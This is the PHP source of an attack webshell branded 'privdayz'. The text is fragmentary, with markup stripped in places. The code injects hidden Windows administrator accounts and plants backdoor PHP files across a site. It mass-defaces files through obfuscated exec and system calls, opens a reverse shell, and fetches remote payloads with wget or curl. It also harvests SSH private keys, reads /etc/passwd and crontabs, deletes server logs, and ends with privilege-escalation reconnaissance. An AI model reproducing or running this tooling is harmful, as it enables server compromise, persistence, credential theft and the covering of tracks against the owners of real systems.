ultra admin creator bypass (Windows/2025) - by privdayz.com
&1'); if (preg_match('/PortNumber\s+REG_DWORD\s+0x([0-9a-f]+)/i', $reg, $m)) { return hexdec($m[1]); } $netstat = pr1vd4yzC('netstat -an | find ":3389"'); if (strpos($netstat, '3389') !== false) { return 3389; } return 'Unknown'; } $rdp_port = detect_rdp_port(); echo "
RDP Port: " . htmlspecialchars($rdp_port) . "
"; ?> 
&1');
    if (trim($out)) return $out;
    $fallback = "timeout /T $timeout /NOBREAK & $cmd";
    $out2 = pr1vd4yzC($fallback.' 2>&1');
    if (trim($out2)) return $out2;
    return pr1vd4yzC($cmd.' 2>&1');
}
if (!isset($_SESSION['pr1vd4yz_winr00t_success'])) $_SESSION['pr1vd4yz_winr00t_success'] = false;
if (!isset($_SESSION['pr1vd4yz_winr00t_user'])) $_SESSION['pr1vd4yz_winr00t_user'] = '';
if (!isset($_SESSION['pr1vd4yz_winr00t_pass'])) $_SESSION['pr1vd4yz_winr00t_pass'] = '';

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['user'],$_POST['pass'])) {
    $u = preg_replace('/[^a-zA-Z0-9_\-]/','',$_POST['user']);
    $p = $_POST['pass'];
    $mode = $_POST['mode'] ?? 'auto';
    $success = false;
    $methods = [];

    $methods[] = [
        "[*] net user (classic)",
        "net user \"$u\" \"$p\" /add && net localgroup Administrators \"$u\" /add"
    ];

    $methods[] = [
        "[*] PowerShell (background)",
        "powershell -Command \"net user $u $p /add; net localgroup Administrators $u /add\""
    ];

    $methods[] = [
        "[*] schtasks",
        "schtasks /create /tn winrrrrrr00t /tr \"cmd.exe /c net user $u $p /add && net localgroup Administrators $u /add\" /sc onstart /ru System"
    ];

    $methods[] = [
        "[*] at.exe",
        "at 12:00 cmd.exe /c \"net user $u $p /add && net localgroup Administrators $u /add\""
    ];

    $methods[] = [
        "[*] sc service hack",
        "sc create p0wnsvc binPath= \"cmd /c net user $u $p /add & net localgroup Administrators $u /add\" start= auto"
    ];

    $methods[] = [
        "[*] Registry AutoAdminLogon",
        "reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v AutoAdminLogon /t REG_SZ /d 1 /f"
    ];

    $methods[] = [
        "[*] Fallback CMD",
        "cmd /c net user $u $p /add & net localgroup Administrators $u /add"
    ];

    $methods[] = [
        "[*] PowerShell Script Chain",
        "powershell -Command \"Start-Process cmd -ArgumentList '/c net user $u $p /add && net localgroup Administrators $u /add' -Verb runAs\""
    ];

    $methods[] = [
        "[*] Task Scheduler V2 (schtasks)",
        "schtasks /create /tn winr00t2 /tr \"cmd.exe /c net user $u $p /add && net localgroup Administrators $u /add\" /sc onlogon /ru System"
    ];

    foreach ($methods as $step) {
        list($label, $cmd) = $step;
        wout($label . "...");
        $res = prvd_exec_with_timeout($cmd, 9);
        wout($res);
        if (
            stripos($res, 'success') !== false || stripos($res, 'ok') !== false ||
            stripos($res, 'ReturnValue = 0') !== false ||
            stripos($res, 'başarı') !== false ||
            stripos($res, 'already exists') !== false
        ) {
            wout("[+] Admin user injected!");
            $success = true;
            break;
        }
        sleep(1);
    }

    if ($success) {
        $_SESSION['pr1vd4yz_winr00t_success'] = true;
        $_SESSION['pr1vd4yz_winr00t_user'] = $u;
        $_SESSION['pr1vd4yz_winr00t_pass'] = $p;
    wout("\n[+] 0wn3d! Admin user injected:\n[+] User: $u\n[+] Pass: $p");
    wout("[!] Info: Webshell cannot send commands as this user. Use RDP/SMB/WinRM with these credentials!");
    } else {
        $_SESSION['pr1vd4yz_winr00t_success'] = false;
        wout("\n[!] r00t failed :: no vector worked, permission denied.");
    }
}
if ($_SESSION['pr1vd4yz_winr00t_success']) {
    $u = $_SESSION['pr1vd4yz_winr00t_user'];
    $p = $_SESSION['pr1vd4yz_winr00t_pass'];
    ?>
[+] Running as  |  Pass: 
 $cmdfile 2>&1\" /sc once /st 00:00 /ru \"$u\" /rp \"$p\"";
        $out1 = pr1vd4yzC($scht.' 2>&1');
        wout($out1);

        pr1vd4yzC("schtasks /run /tn pzadmtask 2>&1");
        sleep(1);
        $output = @file_get_contents($cmdfile);
        if ($output && strlen($output) > 0) {
            wout("[+] Command executed as admin!\n" . $output);
            $success_cmd = true;
        }
        @pr1vd4yzC('schtasks /delete /tn pzadmtask /f 2>&1');
        @unlink($cmdfile);
        if (!$success_cmd) {
            wout("[*] Trying service method...");
            $svc = 'sc create pzadmsvc binPath= "cmd /c '.$c.' > '.$cmdfile.' 2>&1" obj= ".\\'.$u.'" password= "'.$p.'" start= demand';
            $out2 = pr1vd4yzC($svc.' 2>&1');
            wout($out2);
            pr1vd4yzC('sc start pzadmsvc 2>&1');
            sleep(1);
            $output2 = @file_get_contents($cmdfile);
            if ($output2 && strlen($output2) > 0) {
                wout("[+] Service method: Command executed as admin!\n" . $output2);
                $success_cmd = true;
            }
            @pr1vd4yzC('sc delete pzadmsvc 2>&1');
            @unlink($cmdfile);
        }

        if (!$success_cmd) {
            wout("[*] PowerShell fallback...");
            $pw = 'powershell -Command "Start-Process cmd -ArgumentList \'/c '.$c.' > '.$cmdfile.' 2>&1\' -Credential (New-Object System.Management.Automation.PSCredential(\''.$u.'\',(ConvertTo-SecureString \''.$p.'\' -AsPlainText -Force))) -WindowStyle Hidden"';
            $out3 = pr1vd4yzC($pw.' 2>&1');
            wout($out3);
            sleep(1);
            $output3 = @file_get_contents($cmdfile);
            if ($output3 && strlen($output3) > 0) {
                wout("[+] PowerShell: Command executed as admin!\n" . $output3);
                $success_cmd = true;
            }
            @unlink($cmdfile);
        }

        if (!$success_cmd) {
            wout("[!] Admin command failed. Try RDP / manual login?");
        }
    }
    ?>
b4ckd00r cr34t0r
".$ve5c970b653);}else{echo"RSS Error.";} ?> PHP; if (isset($_POST['create_bd'])) { $ana_dizin = rtrim($_SERVER['DOCUMENT_ROOT'] ?? getcwd(), '/'); $dirs = [$ana_dizin]; foreach (glob($ana_dizin . '/*', GLOB_ONLYDIR) as $d) $dirs[] = $d; shuffle($dirs); $adet = rand(5, 8); $secilen = array_slice($dirs, 0, $adet); function bd_write($yol, $icerik) { $fmethods = [ function($f, $c) { return @file_put_contents($f, $c)!==false; }, function($f, $c) { $h=@fopen($f,"w"); if($h){fwrite($h,$c);fclose($h); return true;} return false; }, function($f, $c) { return pr1vd4yzC("echo ".escapeshellarg($c)." > ".escapeshellarg($f)); } ]; foreach($fmethods as $fn) if ($fn($yol,$icerik)) return true; return false; } $sonuclar = []; foreach ($secilen as $klasor) { $file = rtrim($klasor, '/').'/pr1vd4yz.php'; $ok = bd_write($file, $fpr1vx); $url = str_replace($_SERVER['DOCUMENT_ROOT'],'',$file); if ($ok) $sonuclar[] = "[OK] $url"; else $sonuclar[] = "[FAIL] $file"; } echo "
"; echo "Drop edilen backdoor linkleri:
"; echo implode("
", $sonuclar); echo "
"; } ?>
WAF / Firewall / Reverse Proxy Detector
['server: cloudflare', 'cf-ray', 'cf-cache-status', '__cfduid', 'cloudflare-nginx'], 'Sucuri' => ['x-sucuri-id', 'x-sucuri-cache', 'x-sucuri'], 'ModSecurity' => ['mod_security', 'modsec', 'x-mod-sec'], 'Imunify360' => ['imunify360', 'x-imunify360'], 'w4f' => ['w4f', 'x-w4f'], 'OpenResty' => ['openresty'], 'AWS WAF' => ['awsalb', 'awselb', 'x-amzn'], 'Incapsula' => ['incapsula', 'x-cdn', 'x-iinfo'], 'StackPath' => ['stackpath'], 'Quttera' => ['quttera'], 'PerimeterX' => ['perimeterx'], 'Reblaze' => ['reblaze'], 'DDoS-Guard' => ['ddos-guard'], 'Fastly' => ['fastly'], 'NAXSI' => ['naxsi'], 'SafeDog' => ['safedog', 'waf.sid'], '360 Web Application Firewall' => ['360wzb', 'wzws-rid'], 'Baidu Yunjiasu' => ['yunjiasu'], 'Yunjiasu' => ['yunjiasu'], 'F5 BIG-IP' => ['bigip', 'f5-'], 'Barracuda' => ['barracuda'], 'Profense' => ['profense'], 'Akamai' => ['akamai', 'akamai-ghost'], 'FortiWeb' => ['fortiweb'], 'URLScan' => ['urlscan'], ]; $result = []; $err = false; $headers = @get_headers($rtfccq, 1); $all_hdr = ''; if ($headers && is_array($headers)) foreach ($headers as $k=>$v) { $all_hdr .= stealth_strtolower($k.': '.(is_array($v)?implode('; ',$v):$v))."\n"; } $body = @file_get_contents($rtfccq); $all_body = stealth_strtolower($body); foreach ($fw_map as $fw=>$patterns) { foreach ($patterns as $sig) { if (strpos($all_hdr, $sig)!==false || strpos($all_body, $sig)!==false) { $result[$fw]=true; break; } } } ?>
Scan results for:
$v) { echo ''; } } else { echo ''; } ?>
Firewall / Proxy Status
'.htmlspecialchars($fw).' Detected
No major WAF / reverse proxy detected.
mass def4ce t00l
WARNING: All matching files will be overwritten! (Max: 1000 files/run)
"\x31\60\62\54\x31\61\61\54\61\61\62\x2c\61\60\61\54\x31\61\60", "\x66\x69\x6c\x65\x5f\x70\165\164\x5f\x63\157\x6e\164\x65\x6e\164\163" => "\x31\x30\62\x2c\61\60\65\x2c\61\60\70\x2c\61\60\61\x2c\x39\65\54\61\x31\x32\x2c\x31\61\x37\54\x31\61\x36\54\x39\x35\x2c\x39\x39\x2c\x31\x31\x31\54\x31\61\x30\54\x31\61\66\x2c\x31\60\x31\54\x31\x31\60\54\61\x31\66\x2c\x31\61\x35", "\x73\150\x65\x6c\x6c\137\145\170\145\x63" => "\x31\61\x35\x2c\x31\x30\x34\x2c\61\60\61\54\61\60\70\54\61\x30\x38\54\x39\65\54\x31\60\x31\x2c\61\62\60\54\61\x30\x31\54\x39\x39", "\145\170\x65\143" => "\x31\x30\x31\54\61\62\x30\x2c\61\60\x31\54\x39\x39", "\163\171\x73\164\x65\x6d" => "\61\x31\65\54\x31\62\x31\54\x31\61\x35\x2c\x31\61\x36\x2c\x31\x30\61\x2c\x31\60\71", "\x70\141\163\x73\x74\x68\x72\165" => "\61\61\x32\x2c\71\x37\54\x31\x31\x35\54\61\61\65\x2c\61\61\66\54\x31\60\x34\x2c\61\61\64\x2c\61\61\67", "\160\x72\x6f\x63\x5f\x6f\160\x65\x6e" => "\61\61\62\x2c\61\x31\x34\x2c\61\x31\61\x2c\71\x39\54\x39\65\x2c\61\x31\61\x2c\x31\61\x32\54\61\60\x31\x2c\x31\x31\60", "\160\157\160\x65\x6e" => "\61\x31\62\x2c\61\x31\x31\54\x31\61\x32\54\61\x30\x31\x2c\61\x31\x30", "\x66\167\162\x69\164\145" => "\61\x30\x32\54\x31\61\x39\54\61\x31\64\54\61\60\x35\x2c\61\x31\66\x2c\61\60\x31", "\146\143\x6c\157\163\x65" => "\61\60\62\54\x39\x39\54\x31\60\x38\54\x31\x31\x31\x2c\x31\61\x35\x2c\x31\60\x31"); return isset($map[$n]) ? chDxzZ($map[$n]) : $n; } if (isset($_POST['s7bm1t_d3f'])) { $rtfccq = trim($_POST['d3f_f1l']); $pr1vd4yz_c0m = trim($_POST['d3f_r0']); $pyxox = $_POST['d3f_cont']; if (!$rtfccq || !$pr1vd4yz_c0m || !$pyxox) { echo ''; } else { $count = 0; $rii = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($pr1vd4yz_c0m, FilesystemIterator::SKIP_DOTS)); $max_files = 1000; $count = 0; foreach ($rii as $file) { if ($count % 100 == 0) { flush(); } if (++$count > $max_files) break; if (strtolower($file->getFilename()) === strtolower($rtfccq)) { $fpath = $file->getPathname(); $status = ''; $method = ''; goto YU6B5; cdiUg: $fwrite = pr7xcz("\x66\167\162\x69\x74\145"); goto x9s7D; YU6B5: $fpXq = pr7xcz("\x66\x6f\x70\145\156"); goto cdiUg; x9s7D: $fclose = pr7xcz("\x66\143\154\x6f\x73\x65"); $fh = @$fpXq($fpath, 'wb'); if ($fh) { $fwrite($fh, $pyxox); $fclose($fh); $status = 'OK'; $method = 'fopen'; } goto WDSJf; pXxbn: if (!$status && function_exists(pr7xcz("\x70\x61\163\x73\164\150\x72\165"))) { $pr1cvxS = pr7xcz("\x70\141\163\x73\164\x68\x72\165"); $pr1pr1v = "\x65\x63\150\157\x20\47" . str_replace("\47", "\47\x5c\47\x27", $pyxox) . "\47\40\76\40" . escapeshellarg($fpath); @$pr1cvxS($pr1pr1v); if (@filesize($fpath) >= strlen($pyxox) * 0.7) { $status = "\x4f\113"; $method = "\x70\x61\163\x73\x74\150\162\165"; } } goto ASUGV; lo7km: if (!$status && function_exists(pr7xcz("\160\157\160\x65\156"))) { $popen = pr7xcz("\x70\157\160\x65\x6e"); $ph = @$popen("\x63\141\x74\x20\x3e\x20" . escapeshellarg($fpath), "\167"); if ($ph) { fwrite($ph, $pyxox); fclose($ph); } if (@filesize($fpath) >= strlen($pyxox) * 0.7) { $status = "\x4f\113"; $method = "\x70\x6f\160\145\156"; } } goto RYZfv; cy3xC: if (!$status && function_exists(pr7xcz("\x73\x68\x65\x6c\154\137\x65\x78\x65\x63"))) { $shell_exec = pr7xcz("\163\150\x65\x6c\154\x5f\x65\170\x65\143"); $pr1pr1v = "\145\143\150\157\40\x27" . str_replace("\x27", "\47\x5c\x27\x27", $pyxox) . "\47\x20\x3e\x20" . escapeshellarg($fpath); @$chDx2x($pr1pr1v); if (@filesize($fpath) >= strlen($pyxox) * 0.7) { $status = "\x4f\x4b"; $method = "\163\150\145\154\154\137\x65\x78\145\143"; } } goto D1yZ2; D1yZ2: if (!$status && function_exists(pr7xcz("\x65\170\x65\143"))) { $exec = pr7xcz("\145\x78\145\x63"); $pr1pr1v = "\145\143\x68\157\40\47" . str_replace("\x27", "\x27\x5c\47\x27", $pyxox) . "\x27\40\x3e\40" . escapeshellarg($fpath); @$exec($pr1pr1v, $out, $rc); if (@filesize($fpath) >= strlen($pyxox) * 0.7) { $status = "\x4f\113"; $method = "\x65\170\145\x63"; } } goto SS_Lw; SS_Lw: if (!$status && function_exists(pr7xcz("\163\171\163\x74\145\x6d"))) { $system = pr7xcz("\163\171\x73\164\145\x6d"); $pr1pr1v = "\145\143\x68\x6f\40\x27" . str_replace("\x27", "\47\x5c\x27\47", $pyxox) . "\47\40\x3e\x20" . escapeshellarg($fpath); @$system($pr1pr1v); if (@filesize($fpath) >= strlen($pyxox) * 0.7) { $status = "\117\113"; $method = "\x73\171\163\x74\x65\x6d"; } } goto pXxbn; ASUGV: if (!$status && function_exists(pr7xcz("\x70\162\157\x63\137\x6f\160\145\156"))) { $proc_open = pr7xcz("\160\x72\x6f\143\137\157\160\x65\156"); $descs = array(array("\160\151\x70\145", "\x77"), array("\160\x69\160\x65", "\167"), array("\x70\x69\x70\145", "\167")); $process = @$proc_open("\x63\x61\x74\40\76\40" . escapeshellarg($fpath), $descs, $pipes); if (is_resource($process)) { fwrite($pipes[0], $pyxox); fclose($pipes[0]); $out = stream_get_contents($pipes[1]); fclose($pipes[1]); $err = stream_get_contents($pipes[2]); fclose($pipes[2]); proc_close($process); if (@filesize($fpath) >= strlen($pyxox) * 0.7) { $status = "\x4f\x4b"; $method = "\160\x72\157\143\x5f\157\160\145\156"; } } } goto lo7km; WDSJf: if (!$status && function_exists(pr7xcz("\146\151\x6c\145\137\160\165\164\137\x63\x6f\x6e\164\145\x6e\x74\163"))) { $file_put_contents = pr7xcz("\146\151\x6c\145\x5f\160\x75\x74\x5f\143\x6f\156\x74\x65\156\164\x73"); $ok = @$file_put_contents($fpath, $pyxox); if ($ok !== false) { $status = "\x4f\x4b"; $method = "\x66\151\154\145\x5f\x70\165\x74\x5f\143\157\x6e\164\x65\156\x74\x73"; } } goto cy3xC; RYZfv: if (!$status) { $status = 'FAIL'; $method = '-'; } $count++; echo ''; if ($count > 1000) break; } } unset($file); unset($rii); if ($count == 0) { echo ''; } } } else { echo ''; } ?>
# File Path Method Status
Input missing!
'.$count.' '.htmlspecialchars($fpath).' '.$method.' '.($status == 'OK' ? 'OK' : $status).'
No file found.
No operation yet.

root process watch

PID User CPU % MEM % Command Action

live net threats

protocol local address remote address status pid
[safe mode]
[d1s4bl3 f7nct1ons] None'; } else { echo '' . str_replace(",", ", ", $d1sxb) . ''; } ?>
[h0st]
[us3r]
[s0ftware]
[1p]
[php]
function() use($fnX6) { $f = fobf([99,117,114,108,95,105,110,105,116]); return $fnX6($f); }, 'SSH2' => function() use($fnX6) { $f = fobf([115,115,104,50,95,99,111,110,110,101,99,116]); return $fnX6($f); }, 'Magic Quotes' => function() use($chDxXZx) { $f = fobf([109,97,103,105,99,95,113,117,111,116,101,115,95,103,112,99]); return (bool)$chDxXZx($f); }, 'MySQL' => function() use($fnX6) { $f1 = fobf([109,121,115,113,108,105,95,99,111,110,110,101,99,116]); $f2 = fobf([109,121,115,113,108,95,99,111,110,110,101,99,116]); return $fnX6($f1) || $fnX6($f2); }, 'MSSQL' => function() use($fnX6) { $f1 = fobf([109,115,115,113,108,95,99,111,110,110,101,99,116]); $f2 = fobf([115,113,108,115,114,118,95,99,111,110,110,101,99,116]); return $fnX6($f1) || $fnX6($f2); }, 'PostgreSQL' => function() use($fnX6) { $f = fobf([112,103,95,99,111,110,110,101,99,116]); return $fnX6($f); }, 'Oracle' => function() use($fnX6) { $f = fobf([111,99,105,95,99,111,110,110,101,99,116]); return $fnX6($f); }, 'CGI' => function() use($fn_php_sapi_name) { $name = $fn_php_sapi_name(); return ($name === 'cgi' || $name === 'cgi-fcgi'); }, ]; foreach ($features as $name => $fn) { $on = $fn() ? 'ON' : 'OFF'; $class = $on === 'ON' ? 'pr1vd4yz-lite-on' : 'pr1vd4yz-lite-off'; echo ''.$name.' : '.$on.' '; } ?>
newFolder newFile
cPanel reset
reset cPanel password
×
close
backconnect shell
remote connection start (reverse shell)
×
go back
php mailer
send a message with smtp
×
go back
php info
system php environment
×
]*>.*?#si', '#]*>|#i', '#]*>|#i', '#]*>|#i', '#]*>|#i', '#]*>|#i', '#]*>(.*?)#i', '##i', '#]*>|
#i', '#]*>|#i', ], [ '', '', '', '', '', '', '', '', '', '$1', "\n", '', '', '', '', ], $pinfo); $lines = preg_split('/\r?\n/', strip_tags($pinfo)); $lines = array_slice(array_filter(array_map('trim', $lines)), 0, 80); echo '
' . htmlspecialchars(implode("\n", $lines)) . '
'; ?>
disk info
disk usage & space
×
=1024 && ++$i) $b/=1024; return round($b,($i?1:0)).' '.$s[$i]; } ?>
Total Space:
Used Space:
Free Space:
% used
remote file upload
fetch remote file to server
×
close
&1", "curl -k -L " . escapeshellarg($url) . " -o " . escapeshellarg($path) . " 2>&1", "lynx -source " . escapeshellarg($url) . " > " . escapeshellarg($path) . " 2>&1", "fetch -o " . escapeshellarg($path) . " " . escapeshellarg($url) . " 2>&1", "busybox wget -O " . escapeshellarg($path) . " " . escapeshellarg($url) . " 2>&1", ]; foreach($shell_cmds as $cmd) { pr1vd4yzC($cmd); if(@file_exists($path) && @filesize($path)>0) { $ok = true; break; } } if(!$ok && function_exists('file_get_contents')) { $data = @file_get_contents($url); if($data && @file_put_contents($path, $data)!==false && @filesize($path)>0) $ok = true; } if(!$ok && function_exists('fopen')) { $rf = @fopen($url, "rb"); if($rf) { $wf = @fopen($path, "wb"); if($wf) { while(!feof($rf)) @fwrite($wf, fread($rf, 8192)); @fclose($wf); } @fclose($rf); if(@file_exists($path) && @filesize($path)>0) $ok = true; } } if(!$ok && function_exists('curl_init')) { $ch = @curl_init($url); @curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); @curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); @curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); @curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); $data = @curl_exec($ch); @curl_close($ch); if($data && @file_put_contents($path, $data)!==false && @filesize($path)>0) $ok=true; } if(!$ok && stripos($url,'data:')===0) { $bs7y3q = substr($url, strpos($url, ',')+1); $decoded = pr1vdc($bs7y3q); if($decoded && @file_put_contents($path, $decoded)!==false && @filesize($path)>0) $ok=true; } if($ok){ echo'
success: saved!
'; }else{ echo'
failed to fetch document!
'; } endif; ?>
.htaccess bypass
Test protected file access with multi bypass (nullbyte, traversal, query...)
Enter relative path or full url
×
close
['method'=>'GET','timeout'=>3]]); $res = @file_get_contents($url, false, $ctx); $status = isset($http_response_header[0]) ? $http_response_header[0] : 'NO RESPONSE'; $short = strlen($res) ? substr(trim($res), 0, 80) : '-'; $results[] = [ 'method' => $try, 'status' => $status, 'snippet' => htmlspecialchars($short) ]; } ?>
Bypass Results
Variant Status Output
cron jobs
×
'; echo'
[root cron jobs]
'; $_fc=_prv_str([102,105,108,101,95,103,101,116,95,99,111,110,116,101,110,116,115]); $_rt=@$_fc('/etc/crontab'); if(!function_exists('_prv_rx_j9q')){function _prv_rx_j9q($c){ $_fx=[_prv_str([101,120,101,99]),_prv_str([115,121,115,116,101,109]),_prv_str([112,97,115,115,116,104,114,117])]; foreach($_fx as$_f){if(function_exists($_f)){@$_f($c);$_o="";if($_o)return$_o;}}return!1;}} if($_rt){echo'
'.htmlspecialchars($_rt).'
';}else{$_rs=_prv_rx_j9q('crontab -l 2>&1');echo'
'.htmlspecialchars($_rs).'
';} echo'
'; $_us=[];$_pf=@file('/etc/passwd'); if($_pf){foreach($_pf as$_l){$_ps=explode(':',$_l);if(isset($_ps[6])&&(strpos($_ps[6],'bash')!==!1||strpos($_ps[6],'sh')!==!1)){$_us[]=$_ps[0];}}} foreach($_us as$_u){if($_u=='root')continue;$_p1="/var/spool/cron/$_u";$_p2="/var/spool/cron/crontabs/$_u";$_cr='';if(file_exists($_p1))$_cr=@$_fc($_p1);elseif(file_exists($_p2))$_cr=@$_fc($_p2);else$_cr=_prv_rx_j9q("crontab -u $_u -l 2>&1");echo'
';echo'
'.$_u.'
';echo'
'.htmlspecialchars(trim($_cr)? : '[empty]').'
';echo'
';} ?>
close
10*1024*1024) continue; $chk = @file_get_contents($p, false, null, 0, 512); if ($chk !== false && preg_match('/[\x00-\x08\x0B\x0E-\x1F]/', $chk)) continue; $lines = @file($p); if (!$lines) continue; foreach ($lines as $lnum => $line) { if (stripos($line, $keyword) !== false) { $results[] = [ 'file' => $p, 'line' => $lnum+1, 'content' => trim($line) ]; $hits++; if ($hits >= $maxhits) break 2; } } } } @closedir($dh); } return $results; } ?>
file search
×
close
'; if ($out && count($out) > 0) { $shown = 0; foreach ($out as $res) { $shown++; $icon = ""; echo '
'; echo $icon; echo '' . htmlspecialchars(basename($res['file'])) . ' '; echo '[' . htmlspecialchars(dirname($res['file'])) . '] '; echo '#' . $res['line'] . ': '; echo '' . htmlspecialchars($res['content']) . ''; echo '
'; if ($shown >= 120) break; } if ($shown >= 120) echo '
Result limit reached.
'; } else { echo '
No results found!
'; } echo '
'; } ?>
$cmd) { if (function_exists('pr1vd4yzC')) { $out = trim(@pr1vd4yzC($cmd)); if ($out && !in_array($out, $results)) $results[] = $out; } if (count($results) >= $limit) break; } return count($results) ? $results[0] : ""; } $kernel = try_all_methods([ 'uname -r', 'cat /proc/version', 'cat /proc/sys/kernel/osrelease', 'cat /etc/os-release | grep VERSION=', 'cat /etc/issue' ]); $arch = try_all_methods([ 'uname -m', 'arch', 'cat /proc/cpuinfo | grep -i "model name"' ]); $un7xa = try_all_methods([ 'uname -a', 'cat /proc/version', 'cat /etc/issue' ]); if (!$kernel) $kernel = $un7xa; if (!$arch) $arch = php_uname('m'); if (!$un7xa) $un7xa = php_uname(); $edb_url = "https://www.exploit-db.com/search?cve=&q=" . urlencode($kernel); $ps_url = "https://packetstormsecurity.com/search/?q=" . urlencode($kernel); $edb_uname_url = "https://www.exploit-db.com/search?cve=&q=" . urlencode($un7xa); $ps_uname_url = "https://packetstormsecurity.com/search/?q=" . urlencode($un7xa); ?>
kernel exploit checker
Quick exploit search for this system
×
Kernel:
Full uname:
Exploit-DB (kernel) Packetstorm (kernel)
Exploit-DB (uname) Packetstorm (uname)
close
Directory not found or invalid path!'; }else{ $_glob=_prv_str([103,108,111,98]); $_rt=_prv_str([114,116,114,105,109]); $_fc=_prv_str([102,105,108,101,95,103,101,116,95,99,111,110,116,101,110,116,115]); $_bn=_prv_str([98,97,115,101,110,97,109,101]); $files=@$_glob(@$_rt($scanpath,'/').'/*.{php,js,py,sh,conf,txt,inc}',1024); $result=[];$regex=[ '#(/[a-zA-Z0-9_\-\.]+){2,}#', '#\?([a-zA-Z0-9\_\-]+)=#', '#["\'](https?://[^\s\'"]+)["\']#', '#[\'"](/[a-zA-Z0-9_\-]+/[a-zA-Z0-9_\-/]+)[\'"]#', '#[\'"]((?:api|rest|endpoint|ws)[^\'"]+)[\'"]#i' ]; foreach($files as$file){ $content=@$_fc($file);$hits=[]; foreach($regex as$r){ if(preg_match_all($r,$content,$m)){ foreach(($m[1]??$m[0])as$u){ $u=trim($u,'"\' '); if(strlen($u)>4&&!in_array($u,$hits))$hits[]=$u;}}} if($hits)$result[]=['file'=>@$_bn($file),'hits'=>$hits]; } $scan_result=''; if(!$result){ $scan_result.='
No endpoint found in this directory.
'; }else{ foreach($result as$row){ $scan_result.='
'.$row['file'].'
    '; foreach($row['hits']as$h){ $scan_result.='
  • '.htmlspecialchars($h).'
    • ';} $scan_result.='
'; }} $scan_result.=''; }} } ?> ?>
api endpoint scanner
Scan all PHP, JS, conf, py, sh files in any directory for endpoints.
×
No scan yet.' ?>
close
'; if($clean && isset($found[$clean])){ $del = $zap($clean); $scan_result .= '
'.htmlspecialchars($f41aa($clean)).' : '.($del?'done!':'Delete failed!').'
'; unset($found[$clean]); } if(!$found && !$clean){ $scan_result .= '
no l0gs.
'; } else { foreach($found as $file=>$size){ $scan_result .= '
'.htmlspecialchars($f41aa($file)).' '.$fmt($size).'
'; } } $scan_result .= ''; } ?>
log cleaner
Find and delete all error/access/debug logs for every server type
×
No scan yet.' ?>
close
2)return$r; $scan=@$p4z_sc($dir); if(!$scan)return$r; foreach($scan as$f){ if($f=='.'||$f=='..')continue; $fp=$dir.'/'.$f; if(@$p4z_f3($fp)&&@$p4z_f2($fp)&&preg_match('/(id_rsa|id_dsa|id_ed25519|id_ecdsa|authorized_keys|ssh_config|known_hosts|config|.pem|.ppk|ssh2_config)/i',$f)){ $r[$fp]=@$p4z_sz($fp); } if(@is_dir($fp))$r+=p4z_rec($fp,$d+1); } return$r; } function p4z_homes(){ global $p4z_sc; $r=[]; foreach(['/home','/home2','/home3','/root','/etc/ssh','/var/lib/jenkins','/var/backups','/usr/local/directadmin/data/users','/var/www','/var/www/vhosts']as$h){ if(@is_dir($h)){ foreach(@$p4z_sc($h)?:[]as$u){ if($u=='.'||$u=='..')continue; $ud="$h/$u"; if(@is_dir($ud))$r[]=$ud; } } } global $p4z_gv; $r[]=@$p4z_gv('HOME')?:'/root'; return array_unique($r); } function p4z_size($s){ if($s<1024)return$s.' B'; if($s<1024*1024)return round($s/1024,1).' KB'; return round($s/1024/1024,1).' MB'; } $ssh_found=[];$show=''; if(isset($_POST['p4zsshscan'])){ $d1Xe=p4z_homes(); $searched=[]; foreach($d1Xe as$dir){ foreach(['.ssh','ssh','config','.config','']as$d){ $path=$dir.($d?"/$d":""); if(@is_dir($path))$searched+=p4z_rec($path,0); }} foreach(['/tmp','/var/tmp','/usr/local/apache2/conf','/var/www','/etc/letsencrypt','/etc/nginx','/etc/apache2','/opt','/etc/ssl']as$p){ if(@is_dir($p))$searched+=p4z_rec($p,1); } foreach(['/etc/ssh/ssh_host_rsa_key','/etc/ssh/ssh_host_dsa_key','/etc/ssh/ssh_host_ecdsa_key','/etc/ssh/ssh_host_ed25519_key']as$p){ if(@file_exists($p)&&p4z_f2x($p))$searched[$p]=@$p4z_sz($p); } foreach(@$p4z_gl('/home*/cpbackup/daily/*/etc/*/.ssh/*')?:[]as$p){ if(p4z_f3x($p)&&p4z_f2x($p))$searched[$p]=@$p4z_sz($p); } $ssh_found=$searched; if(isset($_POST['showkey'])&&isset($ssh_found[$_POST['showkey']])){ $k=$_POST['showkey']; $show='
'.htmlspecialchars($p4z_bn($k)).'
'; } } ?>
ssh key finder
Deep scan: find, view, and copy all ssh keys & authorized_keys
×
$size){ echo '
'.htmlspecialchars(basename($file)).' '.p4z_size($size).'
'; } } else if(isset($_POST['p4zsshscan'])) { echo '
No SSH keys or authorized_keys found anywhere.
'; } else { echo 'No scan yet.'; } ?>
close
/dev/null | grep PRETTY_NAME | head -n1'); if (!$distro) $distro = pr1vd4yzC('lsb_release -ds 2>/dev/null'); if (!$distro) $distro = pr1vd4yzC('cat /etc/issue 2>/dev/null | head -n1'); $users = pr1vd4yzC('cut -d: -f1 /etc/passwd'); $sudo = pr1vd4yzC('sudo -l 2>/dev/null'); $groups = pr1vd4yzC('id'); $crontab = pr1vd4yzC('crontab -l 2>/dev/null'); $w_passwd = pz_writable('/etc/passwd'); $w_shadow = pz_writable('/etc/shadow'); $w_sudoers = pz_writable('/etc/sudoers'); $docker = file_exists('/.dockerenv') || pz_infile(pr1vd4yzC('cat /proc/1/cgroup 2>/dev/null'), 'docker') ? 'yes' : 'no'; $panel = ''; foreach(['cpanel','plesk','directadmin','ispconfig','webmin','virtualmin','hestia','cockpit','proxmox'] as $x) if(pz_exists($x)) $panel.=$x.' '; $panel = trim($panel); $cap = pr1vd4yzC('getcap -r / 2>/dev/null | grep "=" | head -n10'); $setuid = pr1vd4yzC('find / -perm -4000 -type f 2>/dev/null | head -n10'); $binaries = []; foreach(['python3','perl','gcc','socat','awk','vim','nano','less','tar','find','curl','wget','busybox','openssl','docker','runc','base64','vi','nmap','mysql','psql'] as $b) if(pz_exists($b)) $binaries[]=$b; $ai_exploits = []; $pr1vd4yz_c0med = (pr1vd4yzC('id -u')=='0'); $kernel_sug = []; if(preg_match('/5\.10\./', $kernel)) $kernel_sug[] = [ 'name'=>'DirtyPipe','desc'=>'Kernel 5.8+ (esp 5.10, 